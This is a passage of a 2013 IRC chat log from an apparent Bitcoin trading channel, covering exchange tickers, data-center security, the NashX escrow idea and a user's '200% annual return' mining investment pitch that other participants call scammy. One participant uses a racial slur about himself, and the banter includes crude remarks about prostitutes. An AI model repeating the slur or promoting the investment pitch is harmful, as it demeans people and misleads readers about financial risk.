to spot Apr 25 15:28:09 you can judge people's motives based on what the probable outcome is...that is how we do it now Apr 25 15:28:25 he pointed the gun at me, then fired...i assume his motive is to do me harm Apr 25 15:28:32 but no, you are right, i couldn't read his mind Apr 25 15:29:17 anyway, the main rule for "valuation" is something is worth whatever i can sell it for Apr 25 15:29:31 that is its price...whatever someone is willing to pay Apr 25 15:32:07 https://bitcointalk.org/index.php?topic=186041.0 Apr 25 15:32:10 omfg all the fun! Apr 25 15:32:17 and nobody here said anything! Apr 25 15:32:45 maximian tradefortress etc! Apr 25 15:40:00 lol, that was a great thread, and i love erik's response Apr 25 15:40:07 please take me off your list Apr 25 15:44:51 ^^this Apr 25 15:45:06 lol, exactly Apr 25 15:47:44 jimmy hendrix was pretty cool Apr 25 15:48:20 anyway, the point is that people's genes don't matter, what they do matters Apr 25 15:48:42 Anyone here interested in Investing on a 200% annual return asset ? Apr 25 15:48:51 SHUT UP AND TAKE MY MONEY Apr 25 15:48:55 OMG yes! tell me more! Apr 25 15:49:10 yeah, i really want to send money to someone online Apr 25 15:49:10 BTCOxygen do you have a skateboard? Apr 25 15:49:16 kakobrekla: YES Apr 25 15:49:28 https://bitcointalk.org/index.php?topic=184305.0 Apr 25 15:49:38 ^^^^ This is what I am doing. Apr 25 15:49:48 If anyone wants to Invest please PM me. Apr 25 15:50:01 imma go puke now. Apr 25 15:50:22 Don't miss out the great Opportunity. Apr 25 15:50:35 Opportunity only comes once. Apr 25 15:50:44 it sure does, you would be a fool to pass this up Apr 25 15:50:59 don't let this opportunity pass you by Apr 25 15:51:25 act now, supplies are limited Apr 25 15:53:47 lmao this chan. Apr 25 15:54:00 somebody was visiting and they were "why are you always on irc anyway" Apr 25 15:54:16 i turn around, look at irc, it's... hey! read this! now you tell me. Apr 25 15:55:12 BTCOxygen i detect insufficient yellow in your sale page. Apr 25 15:56:01 mircea_popescu: I will add more if you want ...lol Apr 25 15:56:22 also isn't it traditional to have a square box with shadow and reflection underneath ? Apr 25 15:56:26 where is your box ? Apr 25 15:59:33 Also the 2800GH/s is == 3000GH/s Apr 25 15:59:45 I will be editing this in a few hours. Apr 25 16:00:13 thestringpuller lol that's one longass reddit post dood Apr 25 16:04:17 BMMO guy in otc? Apr 25 16:05:21 !l glbse bmmo Apr 25 16:05:35 o Apr 25 16:05:39 assy bitch Apr 25 16:09:42 So anyone interested ? Apr 25 16:09:54 The more gradients, textures, and drop shadows, the more trustworthy Apr 25 16:10:09 kakobrekla hey, wanna go into that thread and be all like "o mem's totally right, we're boycotting mpex nao" ? Apr 25 16:10:40 .... Apr 25 16:11:21 bitcoin is based on drama! Apr 25 16:11:26 needs also trolling. Apr 25 16:11:34 but im a sloveny nigger Apr 25 16:11:44 mircea_popescu: What does it take to launch an asset on mpex ? Apr 25 16:12:00 ThickAsThieves: i finally get it now Apr 25 16:12:23 thick ass thieves: bunch of bootycilious black chicks stealing your flatscreen TV? Apr 25 16:12:28 what do i win Apr 25 16:12:49 [BTCTC] [B.YABMC] 10 @ 0.01629 = 0.1629 BTC [-] Apr 25 16:12:54 BTCOxygen a business plan is a good start. a wot presence is necessary. Apr 25 16:12:58 you win the privelege of gicing me lifetime free access to bitfetch! Apr 25 16:13:04 giving* Apr 25 16:13:08 There are currently 158341.61 bitcoins demanded at or over 50.0 USD, worth 14196719.2615 USD in total. | Data vintage: 46.7810 seconds Apr 25 16:13:16 There are currently 46909.977 bitcoins offered at or under 200.0 USD, worth 8370931.75556 USD in total. | Data vintage: 54.7003 seconds Apr 25 16:13:17 kakobrekla slovenly somalian Apr 25 16:13:21 could be like a band name Apr 25 16:13:25 lmao Apr 25 16:13:31 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Apr 25 16:13:40 [BTCTC] [BTC-BOND] 3 @ 0.009996 = 0.03 BTC [+] Apr 25 16:14:23 kakobrekla sounds likea good name for a beastly street fighter character, much better than blanka Apr 25 16:14:36 totally. Apr 25 16:16:31 [BTCTC] [ASICMINER-PT] 1 @ 1.162 BTC [-] Apr 25 16:16:36 [BTCTC] [ASICMINER-PT] 1 @ 1.16101 BTC [-] Apr 25 16:16:46 [BTCTC] [ASICMINER-PT] 1 @ 1.161 BTC [-] Apr 25 16:16:55 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Apr 25 16:17:03 [BTCTC] [ASICMINER-PT] 13 @ 1.15 = 14.95 BTC [-] Apr 25 16:22:18 hey someone should tell evoorhees to get his act together Apr 25 16:22:25 just sayin Apr 25 16:23:40 what he do now ? Apr 25 16:24:06 nothing Apr 25 16:24:11 that's the problem Apr 25 16:24:39 he keeps saying he's doing so much behind the scenes Apr 25 16:24:41 he says they're working on things. Apr 25 16:24:49 so reassuring Apr 25 16:24:52 How much does cost 1 put or call btcusd option on MPEX? if price is fluctuating, give me aprx price, thanks! Apr 25 16:25:29 I just keep buying at this bottom price Apr 25 16:25:36 but I hope he does get his act together Apr 25 16:26:05 i've pretty much given up Apr 25 16:26:32 i so no reason not to Apr 25 16:26:34 see Apr 25 16:27:05 well I buy at 2.x Apr 25 16:27:11 and then resell at 3.x Apr 25 16:27:15 to cover for my losses Apr 25 16:27:23 yes i did that for a while Apr 25 16:27:23 but it should go up a lot more Apr 25 16:27:33 but its like swimming upstream Apr 25 16:27:41 feels cool to arb it up Apr 25 16:27:53 but then it never actually rises in value Apr 25 16:28:01 and divs are shit Apr 25 16:28:15 maybe next dividend makes it rise some more Apr 25 16:28:17 i guess at these prices it's not too bad divs-wise Apr 25 16:28:25 last one was complete shit of course Apr 25 16:28:57 I think we'll be getting 5x as much (my last calc using dooglus stats) Apr 25 16:29:22 erik argues away promoting the site a lot, explains away adding features, and barely communicates at all Apr 25 16:29:40 i know things take time Apr 25 16:29:54 but the whole thing is going stale Apr 25 16:29:56 hmm.. I'll ask him as well on Skype what the deal is Apr 25 16:30:36 carpe fucking diem plz Apr 25 16:30:47 it's a gold mine left to waste right now Apr 25 16:31:12 he's probly just enjoying the good life Apr 25 16:31:37 well hire someone to do it for you then Apr 25 16:32:09 if you want to enjoy the good life Apr 25 16:32:21 that's what I'd do Apr 25 16:37:32 Whats the avarage annual return users are interested in ? Apr 25 16:38:33 i wonder if anyone is noticing the striking similarities between the debates surrounding assignats back in 1790s France and the current debates re bond buying/tapering going on in the US. Apr 25 16:42:31 ;;eightball coffee or double coffee ? Apr 25 16:42:32 The outlook is poor. Apr 25 16:43:08 ;;ticker m s.dice Apr 25 16:43:09 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Apr 25 16:43:14 https://bitcoin-central.net/ << updated. Apr 25 16:43:15 !ticker m s.dice Apr 25 16:43:16 [MPEX:S.DICE] 1D: 0.00299999 / 0.00339576 / 0.00349938 (2776 shares, 9.43 BTC), 7D: 0.0012 / 0.00275111 / 0.00371221 (72695 shares, 199.99 BTC), 30D: 0.0012 / 0.00318998 / 0.00449999 (1539370 shares, 4,910.56 BTC) Apr 25 16:43:54 Yep, better communication this time Apr 25 16:44:05 mircea_popescu: I hadn't, but hadn't heard of assignats either. Does seem strikingly similar indeed. I need to read more. Apr 25 16:44:22 do. Apr 25 16:44:44 quite fascinating stuff for the troubles at hand. Apr 25 16:46:35 For sure, thanks for point it out. Apr 25 16:46:40 pointing* Apr 25 16:47:30 uh Apr 25 16:47:34 thats preety harsh Apr 25 16:47:42 the bitcoin central thing. Apr 25 16:47:44 http://www.bitcoinnotbombs.com/ << who's this ? Apr 25 16:48:03 kakobrekla sucxks to be them Apr 25 16:48:03 [MPEX] [S.MPOE] 8250 @ 0.00068248 = 5.6305 BTC [+] Apr 25 16:48:11 [MPEX] [S.MPOE] 383 @ 0.00068428 = 0.2621 BTC [+] Apr 25 16:48:13 [MPEX] [S.MPOE] 9850 @ 0.00068711 = 6.768 BTC [+] Apr 25 16:48:14 [MPEX] [S.MPOE] 4699 @ 0.00069044 = 3.2444 BTC [+] Apr 25 16:48:19 closing down completley is bad Apr 25 16:49:06 !ticker h sdice Apr 25 16:49:08 [HAVELOCK:SDICE] 1D: 0.28000003 / 0.29034105 / 0.29860000 (95 shares, 27.58240017 BTC), 7D: 0.12500000 / 0.25745377 / 0.34000000 (978 shares, 251.78978676 BTC), 30D: 0.12500000 / 0.32869628 / 0.47500000 (6867 shares, 2257.15735224 BTC) Apr 25 16:49:13 and its making the thing look worse than it is Apr 25 16:49:30 i would guess they just need to do a complete audit by now Apr 25 16:49:32 i can see it. Apr 25 16:51:10 OVH as well Apr 25 16:51:37 for small sum, it's perfect Apr 25 16:51:58 for UE customer speaking Apr 25 16:55:37 its incomprehensible to me that anyone would use a shared/rented/vps hosting platform for anything bitcoin related Apr 25 16:56:00 if you dont own your own servers and have them locked in a cage that only you have access to, you're just asking for trouble. Apr 25 16:56:33 topace: BECAUSE PEOPLE ARE STUPID Apr 25 16:56:37 topace only recently we became rich enough for most services rto afford this Apr 25 16:56:47 the iris scanners at my data center supposedly can even tell the difference between a dead eye and a live eye (so if someone kills me and takes my eyeball, tehy STILL cant get in :p) Apr 25 16:56:55 and there's inertia in the world, people stick to what worked in the past Apr 25 16:57:04 I have told people at least 9000 fucking times Apr 25 16:57:04 not to do that Apr 25 16:57:04 DO THEY LISTEN Apr 25 16:57:04 NOOOOOOOOOOooooOOOOOOOOOOooooooOOOOOOOOOooooooooOOOOOOOOOoooooooOOOOOOO Apr 25 16:57:12 all iris scanners can tell that difference topace Apr 25 16:57:20 iris scanning works by looking for pulse deformations. Apr 25 16:57:22 huh didnt know that Apr 25 16:57:35 i know very little about biometric identification, other than its fucking cool Apr 25 16:57:37 when your heart sends a pulse the small vesells in the retina dilate. Apr 25 16:58:25 !ticker h him Apr 25 16:58:26 [HAVELOCK:HIM] 1D: 1.44000000 / 1.54785357 / 1.84870000 (28 shares, 43.33990001 BTC), 7D: 1.44000000 / 1.70778165 / 1.87000000 (87 shares, 148.57700374 BTC), 30D: 0.75000001 / 1.66746181 / 2.08000000 (750 shares, 1250.59635382 BTC) Apr 25 16:58:27 an iris scanner is only useful if there is a man with a rifle standing next to it. otherwise the enemy can rip it off the wall and replace it with a doctored one, for replay attack. Apr 25 16:58:31 !ticker h vtx Apr 25 16:58:33 [HAVELOCK:VTX] 1D: 0.40001000 / 0.45057476 / 0.46000000 (230 shares, 103.63219565 BTC), 7D: 0.31000000 / 0.43977087 / 0.49750000 (1237 shares, 543.99656624 BTC), 30D: 0.18000000 / 0.41107685 / 0.73925000 (6237 shares, 2563.88634246 BTC) Apr 25 16:59:23 asciilifeform if there's a man with a rifle standing by it a hot chick wearing just a belt still can rip anything off she pleases. Apr 25 16:59:43 asciilifeform: the entrance to my data center is manned 24/7 behind bulletproof glass Apr 25 16:59:57 or lexan, or something Apr 25 17:00:49 and the walls and floor are 8 feet thick reinforced concrete Apr 25 17:00:51 i wonder what teh roof is like Apr 25 17:00:55 cant imagine its concrete... Apr 25 17:01:41 topace: ATMs encased in concrete (as bulletproof as it gets) are routinely stolen, using bulldozers. it might help for your cage to be several floors above ground. Apr 25 17:02:35 everything is useless if it's a inside job... Apr 25 17:02:59 or if your wife&kids are kidnap at house Apr 25 17:03:39 at any rate, it is much cheaper to have the owner of the servers "voluntarily" open the door. Let's say, with one of these: http://www.wired.com/magazine/2010/12/ff_collarbomb/ around his neck. Apr 25 17:05:13 topace: do you - personally - live, eat, work, etc. behind 8 feet of concrete? if not, the above link is relevant. Apr 25 17:05:31 hehe no, i do not Apr 25 17:05:59 you mean 2.43m of concrete? Apr 25 17:06:02 jesus fucking christ Apr 25 17:06:03 you should ;) Apr 25 17:06:13 whoa Apr 25 17:06:26 this guy is like a repository of the obscure Apr 25 17:07:26 mirce_popescu: the damn collar bomb was front page news worldwide some years ago. and before that, it featured in two separate SF films, before some bastard actually built some. Apr 25 17:08:19 i don't keep up so well with the popcult. Apr 25 17:08:52 my point, as always, is that Bitcoin users are, like it or not, playing the Big Game. and this game has rules very different from everyday "public" life, and it helps to be aware of them. Apr 25 17:10:10 surely. Apr 25 17:10:42 I mention the collar because it is picturesque, and because it is a simple and elegant way to have a guy without a family to take hostage do something "voluntarily." Apr 25 17:10:44 however, bitcoin users are the balding delivery man. the 5 inch gash is exceedingly more likely than the successful scavenger hunt. Apr 25 17:11:18 s/a guy without a family/ a guy without a family who cares about you pointing guns at him/ Apr 25 17:11:54 8 foot thick walls of steel reinforced concrete is a bit much to believe Apr 25 17:12:08 the idea is, if you have personal cryptographic control over serious BTC, you need to be ready (and physically equipped) to fight to the death. Apr 25 17:12:34 or partner with someone you can trust, who is. Apr 25 17:12:41 i visited many data centers and the sales people at each one do a great job at making you think not even houdini could get in or out Apr 25 17:13:01 KRS-1 all true bunkers smell faintly of pee. Apr 25 17:13:12 KRS-1: you know what routinely gets in (and out)? Replacement switches, routers, cables. That come from hell knows where. Apr 25 17:13:13 (it's from sweat, not the actual pee) Apr 25 17:13:31 million tons of granite didn't help piratebay's servers from getting raided Apr 25 17:13:43 therefore Apr 25 17:13:45 granite sucks Apr 25 17:13:50 haha Apr 25 17:14:50 "Wells was a loyal employee—in 10 years, the only time he had called in late for work was when his cat died." Apr 25 17:14:51 sucks. Apr 25 17:16:26 i think i'm going to change careers Apr 25 17:16:42 my new job requires police academy though Apr 25 17:19:56 good luck if you are looking toward any kind of law enforcement or government job requiring law enforcement/police academy training. Apr 25 17:20:45 prolly not worth the pay in the coming years. Apr 25 17:20:56 They're taking all of the military personnel returning from overseas as preferential applicants by U.S. Law Apr 25 17:20:58 ideally you want to be the fireman in winter, not dry late summer. Apr 25 17:21:28 KRS-1: its a good policy anyhow Apr 25 17:22:14 mircea_popescu: the pay was never worth anything ...I used to do it (won't mention what) but it was Government employment and the pay wasn't dick. I went back to college and entered the corporate world and never looked back. Tripled my income and wound up working less/less stress..etc. Apr 25 17:22:24 mircea_popescu: some people like fire. Apr 25 17:22:48 Diablo: without a doubt. Apr 25 17:23:23 KRS-1 now imagine all that + being paid in worthless govt script for getting quite really killed. Apr 25 17:23:27 KRS-1: this is why Blackwater (or Craft International) or who knows where else. Apr 25 17:23:32 asciilifeform the people who do never work for govts. Apr 25 17:24:07 mircea_popescu: mercenaries work for the highest bidder. at the moment, the fellows with the tinted windows are the highest bidder. Apr 25 17:24:25 this is not even remotely true. Apr 25 17:24:31 consider the easier and more familiar case of whores. Apr 25 17:24:42 whores don't work for the highest bidder. they merely pretend to. Apr 25 17:24:49 they work either for themselves, or for the coolest bidder. Apr 25 17:25:11 Right, quite often not even market forces are at work with the mistresses for hire. Apr 25 17:25:21 what is a 'coolest bidder'? Apr 25 17:25:28 heh Apr 25 17:25:38 The dorky guy at the end of the bar who has the coke Apr 25 17:25:53 you mean the easy work? Apr 25 17:26:01 [BTCTC] [PAJKA.BOND] 3 @ 0.09799 = 0.294 BTC [+] Apr 25 17:26:17 What can I say its not hard to figure out. I frequent establishment such establishments. Apr 25 17:26:17 or like groupies? Apr 25 17:26:49 sp. I frequent such establishments Apr 25 17:27:07 i know nothing of whores, but i'd assume they, like many, want the easiest work for the most pay Apr 25 17:27:19 or coke Apr 25 17:27:37 hell sometimes you can just buy em drinks Apr 25 17:28:01 The U.S. money printer can buy you all the coke you could dream of. Apr 25 17:28:01 ltc on gox could make for good bets Apr 25 17:28:03 ThickAsThieves depends. it may be the coke, sure, but more often than not it's quite animalic. Apr 25 17:28:15 whores are people too, they have their tickle spots, their likes, etc Apr 25 17:28:50 so they may prefer johns that look like good lays? Apr 25 17:28:55 for less pay Apr 25 17:28:58 yep ..i dated a dancer or two in my time..they're fun but not worth the aggrivation most of the time Apr 25 17:29:39 [BTCTC] [B.YABMC] 20 @ 0.01629 = 0.3258 BTC [-] Apr 25 17:29:49 [BTCTC] [B.YABMC] 1 @ 0.01304 BTC [-] Apr 25 17:29:54 [BTCTC] [B.YABMC] 3 @ 0.0125 = 0.0375 BTC [-] Apr 25 17:30:26 I imagine that working for Blackwater is less like being a normal whore and more like being the king's expensive mistress. Apr 25 17:30:47 At least, if you're somewhere above the bottom foot-soldier level. Apr 25 17:31:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 25 17:31:21 i imagine any job like that comes with a notable chance you;ll end up killed by your own too Apr 25 17:32:06 ThickAsThieves: Chris Kyle, etc Apr 25 17:32:14 it happens Apr 25 17:33:03 so kncminer announced a 6GH FPGA based miner, and a 250GH ASIC based miner ? Apr 25 17:33:29 urlpls Apr 25 17:33:33 http://www.kncminer.com/news/news-10 Apr 25 17:35:04 smells scam Apr 25 17:35:14 at retail, the fpga chips from alterra are $$15k Apr 25 17:35:21 for 6GH Apr 25 17:39:00 heh $2795 for the FPGA, with "vouchers for up to $2000 off of any jupiter purchase" Apr 25 17:39:50 kakobrekla wanna drive there ? Apr 25 17:40:02 lmao Apr 25 17:40:16 yea someone go visit them and see if they are real Apr 25 17:40:17 lol Apr 25 17:40:17 $xxxx for ASIC; enjoying the same BTC yield as a cheap GPU today when every other chump has bought an ASIC: priceless. Apr 25 17:40:24 no loccation disclosed afaik Apr 25 17:40:47 cause its so locco Apr 25 17:42:21 ;;bids 0 Apr 25 17:42:24 There are currently 57729608 bitcoins demanded at or over 0.0 USD, worth 19687676.0833 USD in total. | Data vintage: 0.0139 seconds Apr 25 17:42:46 been a while since we dropped below 20M Apr 25 17:44:55 oh no Apr 25 17:44:58 we're going down? Apr 25 17:45:32 topace: the only sane place to get FPGAs is eBay or the equivalent. $100, instead of paying $XX,XXX for the same chip, because of "intellectual property" crapola. Apr 25 17:46:37 topace: you will need a reflow oven, though. (make your own.) Apr 25 17:46:51 hehe Apr 25 17:46:57 right, ill get right on that Apr 25 17:46:57 lippoper http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 25 17:47:06 i hear bfl has fancy in-house machines Apr 25 17:47:10 that will let them ship next week Apr 25 17:47:15 :p Apr 25 17:47:25 they can't because there's a shortage of fans Apr 25 17:47:51 mircea_popescu: no, shortage of Jolt Cola Apr 25 17:48:15 they still make that ?~! Apr 25 17:48:27 mircea_popescu: AFAIK no, hence the shortage. Apr 25 17:50:57 mircea, that article you linked me to is almost a month old Apr 25 17:51:11 great stuff in there, but it seems out of date Apr 25 17:51:25 You should update and write about yesterday's bubble Apr 25 17:51:58 lol the original bitcoin-central announce ended with "We'll be back, also skateboards." Apr 25 18:00:27 topace: Maybe you should just Invest with me and forget about ASICs :P Apr 25 18:01:11 topace: 200% annual return is not bad tho. Apr 25 18:05:47 lippoper it is not out of date inasmuch as btc price does what it says. Apr 25 18:15:49 love the meta debate https://bitcointalk.org/index.php?topic=187378.msg1941436#msg1941436 Apr 25 18:17:23 so this is what they do with the milk! Apr 25 18:18:14 i added my reply. Apr 25 18:18:48 BTCOxygen: I read your business plan if thats what it was- I don't see how investing with you can net more profits than if I bought some of my own units from Avalon batch 4 if there is a batch 4..considering management and Dev costs Apr 25 18:19:33 Not putting your plan down or anything it does seem pretty solid Apr 25 18:20:54 KRS-1: Management fee has been reduced to 10% Apr 25 18:21:04 WIll update OP in a few hours. Apr 25 18:21:50 KRS-1: The costs on our plan are similar to Batch #3 Avalon Apr 25 18:22:38 Still with the re-investment plan the ROI is still above ~100% annually. Apr 25 18:23:31 KRS-1: If there was Batch 4 It would be 75 BTC per unit. Apr 25 18:23:39 plus 4 BTC for shipping Apr 25 18:24:02 Total of 79 BTC per unit Apr 25 18:24:14 Our operation will have 45 Avalon Units. Apr 25 18:24:25 that you'll be pulling from? Apr 25 18:24:31 ass. Apr 25 18:25:11 If you buy 45 Units from Avalon it would cost 45 * 79 == 3,555 BTC Apr 25 18:25:24 So please may I know where my plan is inefficient. Apr 25 18:25:54 the part where you say "If" Apr 25 18:26:03 ;-) Apr 25 18:26:08 ;;getrating BTCOxygen Apr 25 18:26:08 WARNING: Currently not authenticated. User BTCOxygen, rated since Sun Mar 10 14:32:15 2013. Cumulative rating 3, from 3 total ratings. Received ratings: 3 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=BTCOxygen Apr 25 18:26:18 now that's a first./ Apr 25 18:26:29 yeah a suprise! Apr 25 18:26:35 mircea_popescu: I Have not done much trading on OTC. Apr 25 18:26:57 But read the Why trust us part on our thread. Apr 25 18:27:05 https://bitcointalk.org/index.php?topic=184305.0 Apr 25 18:27:26 BTCOxygen in general people presenting themselves with a scammy nonsense thing tend to not be in the wot. Apr 25 18:27:53 before you ask : offering to buy mining gear with opm is scammy by definition. Apr 25 18:28:03 pretty much not one single attempt to date worked out. Apr 25 18:28:19 Hey We have been Operating a pool since Octobor 2012. Apr 25 18:28:32 And have been in the bitcoin community for a long time. Apr 25 18:29:04 so you put down 0.1 btc of your own money? https://blockchain.info/address/1VbWxiGEa1d89ZigFuWWeP5CjDJSK6Xdi Apr 25 18:29:14 lots of confidence Apr 25 18:29:47 kakobrekla: Thats done for testing purpose. Apr 25 18:30:00 O_o Apr 25 18:30:11 to see if bitcoin works? Apr 25 18:30:26 BTCOxygen yes i get it, since oct 2012. nevertheless. Apr 25 18:30:43 this mining farm thing doesn't work. people who can afford asics can just get them Apr 25 18:30:48 Somehow, all the ASIC "shares" schemes remind me of American chumps buying refrigerators on installment plans, with the payments totalling to the cost of a car. Apr 25 18:30:56 people who can't aren't numerous enough to make anything of the sort you're contemplatin workable. Apr 25 18:31:02 "The miser pays twice." Apr 25 18:31:12 there was some marginal business sense in the old gpu days, because running a large gpu farm was non trivial Apr 25 18:31:24 nevertheless, people still chose to pocket the investor's hardware. Apr 25 18:31:45 i think the skepsidyne integrated node is pretty much the obligatory blueprint for all such pooled mining farm ventures. Apr 25 18:32:14 kakobrekla: That was sent to my offline wallet. Apr 25 18:32:28 Was testing that. Apr 25 18:32:54 so you are putting down 0 of your own funds for this Apr 25 18:33:04 well he got the idea... Apr 25 18:33:24 kakobrekla: I will put my funds into this once I see some interest. Apr 25 18:33:30 lol ok. Apr 25 18:33:41 I will be the second investor.... lol Apr 25 18:34:13 glwt Apr 25 18:35:29 [MPEX] [S.MPOE] 801 @ 0.00069044 = 0.553 BTC [+] Apr 25 18:35:32 [MPEX] [S.MPOE] 2550 @ 0.0006914 = 1.7631 BTC [+] Apr 25 18:35:33 [MPEX] [S.MPOE] 6699 @ 0.00069443 = 4.652 BTC [+] Apr 25 18:36:02 [HAVELOCK] [HIM] 5 @ 1.7999 = 8.9995 BTC [-] Apr 25 18:36:26 kakobrekla: Still the ROI is very good on this. Apr 25 18:37:00 pirate had better roi Apr 25 18:37:11 kakobrekla: but pirate == Scammer. Apr 25 18:37:21 hey paid yesterday Apr 25 18:37:24 he Apr 25 18:37:28 lol. Apr 25 18:39:00 yea he came on a skateboard Apr 25 18:39:08 dropped the bag. Apr 25 18:39:14 no, pirate was just a guy trying to leverage "lot of trust" into "give me money", with no businessm odel. Apr 25 18:39:17 just like you. Apr 25 18:41:51 holy shit i always forget that you can use `openssl dgst` Apr 25 18:42:57 these damn vsphere instances dont have any one-way hash bins on the local fs :/ -- openssl to the rescue ftw Apr 25 18:44:32 oldie but goodie: http://www.ribbonfarm.com/2013/01/31/stone-soup-for-the-capitalists-soul/ Apr 25 18:44:48 "You are fair game for hustlers who understand your wealth better than you do." Apr 25 18:46:47 i prefer to express that idea in the terms of the converse perspective. Apr 25 18:46:59 your wealth is, much like your mistress, always ready to ditch you if you suck. Apr 25 18:47:18 "fool and his money soon parted", etc Apr 25 18:59:09 mod6: we have much in common Apr 25 19:01:52 http://www.asicrigs.com/ Apr 25 19:01:54 lol? Apr 25 19:02:29 no i aint driving. Apr 25 19:02:46 i ain't swimmin Apr 25 19:07:42 mp: you always have such great ways of putting things lol nice Apr 25 19:16:35 [MPEX] [S.MPOE] 650 @ 0.00068032 = 0.4422 BTC [-] Apr 25 19:16:37 [MPEX] [S.MPOE] 20600 @ 0.00067869 = 13.981 BTC [-] Apr 25 19:16:38 [MPEX] [S.MPOE] 6550 @ 0.00067663 = 4.4319 BTC [-] Apr 25 19:16:51 [MPEX] [S.MPOE] 9700 @ 0.00067399 = 6.5377 BTC [-] Apr 25 19:30:30 [MPEX] [S.MPOE] 5292 @ 0.00069443 = 3.6749 BTC [+] Apr 25 19:31:08 &avg Apr 25 19:31:08 Error: "avg" is not a valid command. Apr 25 19:31:16 $avg Apr 25 19:31:17 deadweasel: 151.30 Apr 25 19:32:26 BTCOxygen: i already do have 20BTC "invested" with you :p gonna make another paymetn soon ? Apr 25 19:32:47 O_o Apr 25 19:33:17 topace: Yea, Very soon. Apr 25 19:34:07 topace: Do you want to invest those into Our Project ? Apr 25 19:34:42 Then you would have 40 BTC :P Apr 25 19:35:17 topace ok, wut ? Apr 25 19:35:49 secret. :P Apr 25 19:36:40 did you default on some obligation and end up with a payment schedule sort of arrangement ? Apr 25 19:37:55 mircea_popescu: No, He is still getting payments. Buts its secret. Apr 25 19:38:05 but* Apr 25 19:42:06 topace: btw... I have sent you a PM. Apr 25 19:45:50 hello? Apr 25 19:47:10 yes, this is dog. Apr 25 19:47:23 dog? Apr 25 19:47:41 http://pigroll.com/img/hello_yes_this_is_dog.jpg Apr 25 19:48:15 lol Apr 25 19:48:21 mircea_popescu: not really secret, i started mining with btcoxygen when he first started to help "test" his site... I asked for payment on the account from the hashes i contributed, but he didnt have the btc, so he's paying me slowly as he can. Apr 25 19:48:53 which site? Apr 25 19:49:06 btcoxygen.com Apr 25 19:49:17 is mircea here? I got a tweet from him asking to join this chatroom about nashx Apr 25 19:49:27 he is around Apr 25 19:49:27 seongyupyoo heya Apr 25 19:49:39 hey! sorry about 5hrs late Apr 25 19:49:49 topace you mined on his pool yet he didn't have the btc ?! odd. anyway, thanks. Apr 25 19:49:59 seongyupyoo so we were discussing your idea earlier, the nashx Apr 25 19:50:11 which idea is that Apr 25 19:50:17 yeah Apr 25 19:50:18 kakobrekla nashx.com/about i think Apr 25 19:50:25 one major question is how do you deal with trolls ? Apr 25 19:50:26 yes Apr 25 19:50:28 mircea_popescu: yea, guess he didnt find a block for a while, but was still doign PPS Apr 25 19:50:36 and didnt have a "float" to cover bad luck Apr 25 19:50:46 say I just make a deal in order to destroy opm. just for the kicks. Apr 25 19:50:53 topace ah yeah. i see. Apr 25 19:51:09 isn't pps kinda a bad model for mining ? as in, high risk of pool bankruptcy ? Apr 25 19:51:18 topace: Yes, Also the mining server was not funtioning correctly at that time. Apr 25 19:51:22 only for small ones Apr 25 19:51:34 you understand both parties of the trade risk same amount going into a deal? Apr 25 19:51:34 It was a bug that never sent in blocks to bitcoind which is fixed now. Apr 25 19:51:38 yea, a few days of bad luck can bankrupt a small pool that doesnt have a good float Apr 25 19:51:39 seongyupyoo yes. Apr 25 19:51:44 NashX seems like a pretty good idea. It reminds me of my "Shitcoin" proposal (http://www.loper-os.org/?p=988). The real problem is that the "destruction" isn't real destruction - somebody ends up with the BTC. Moral hazard. Apr 25 19:51:47 But I have been paying you from my pocket. Apr 25 19:52:00 i don't think there is anything that can be done about those types of people who don't mind just throwing away money for kicks Apr 25 19:52:07 too bad you didnt pay it all back at $8/btc :p Apr 25 19:52:11 ok, another question seongyupyoo Apr 25 19:52:12 i was thinking there won't be any Apr 25 19:52:15 suppose i want to sell 100 btc. Apr 25 19:52:19 someone wants to buy just 1.5 Apr 25 19:52:21 ok Apr 25 19:52:25 can we deal or does he have to do 100 specifically ? Apr 25 19:52:57 in that case, he or you can make an offer for 1.5 for certain amount, and you should require both risking 3 Apr 25 19:53:34 so i would need to make a new offer basically ? Apr 25 19:53:52 MJR_ ^ Apr 25 19:54:00 yes Apr 25 19:54:10 why what do you think might be better? Apr 25 19:54:22 seongyupyoo atm just trying to understand the system in my head. Apr 25 19:54:39 you would not be making a 100 btc sale offer i don't think ever Apr 25 19:54:42 what about the byzantine problem ? ie, we both satisfy trade, i wait for him to release and then Apr 25 19:54:46 i destroy his coins anyway. Apr 25 19:55:12 when one decides to destroy, all risked funds get destroyed including your own Apr 25 19:55:24 how do you implement this ? Apr 25 19:56:01 well all funds are at risk as long as both have released it, and when anyone destroys, it destroys all funds Apr 25 19:56:37 yes but i mean... this is all handled at the website level ? Apr 25 19:56:42 ie, your own software does this ? Apr 25 19:56:43 yes Apr 25 19:56:51 seongyupyoo: using the word "destroy" when the BTC ends up in your pocket is disingenuous Apr 25 19:57:03 how is the destruction actually implemented ? Apr 25 19:57:09 yes, i won't be keeping in in the near future Apr 25 19:57:10 sent to 10000000000000we ? Apr 25 19:57:17 it will be distributed to active traders Apr 25 19:57:22 o Apr 25 19:57:28 well wait. Apr 25 19:57:38 if im the most active trader i have a perverse incentive to scam ? Apr 25 19:57:44 i just don't want to go into coding all of that without knowing that this app will get any traction Apr 25 19:57:55 so i just wanted to get something working out there for people to see Apr 25 19:57:59 seongyupyoo it's got my interest, which as anyone will tell you is darned rare. Apr 25 19:58:00 gather feedback and go from there Apr 25 19:58:11 that's pretty cool :) Apr 25 19:58:48 so suppose i do 80% of trade on yoru site. does this mean i get 80% of all "Destroyed" funds ? Apr 25 19:59:02 well sounds like you're exactly the type of person i would want trading on nashx, so let me know what you think, and i'll try to make it work for you, and that should work for everyone Apr 25 19:59:23 lol that's an idea. Apr 25 19:59:58 that is an idea... i was originally thinking i would just see past few days logins and distribute evenly, as that would be the easiest to implement Apr 25 20:00:07 but what you're suggesting is possible Apr 25 20:00:15 i was asking because i think it's a horrible idea. Apr 25 20:00:17 not sure if it's better idea though yet Apr 25 20:00:27 why? Apr 25 20:00:31 why not use actual destruction (send to a blackhole address) ? Apr 25 20:00:37 because it 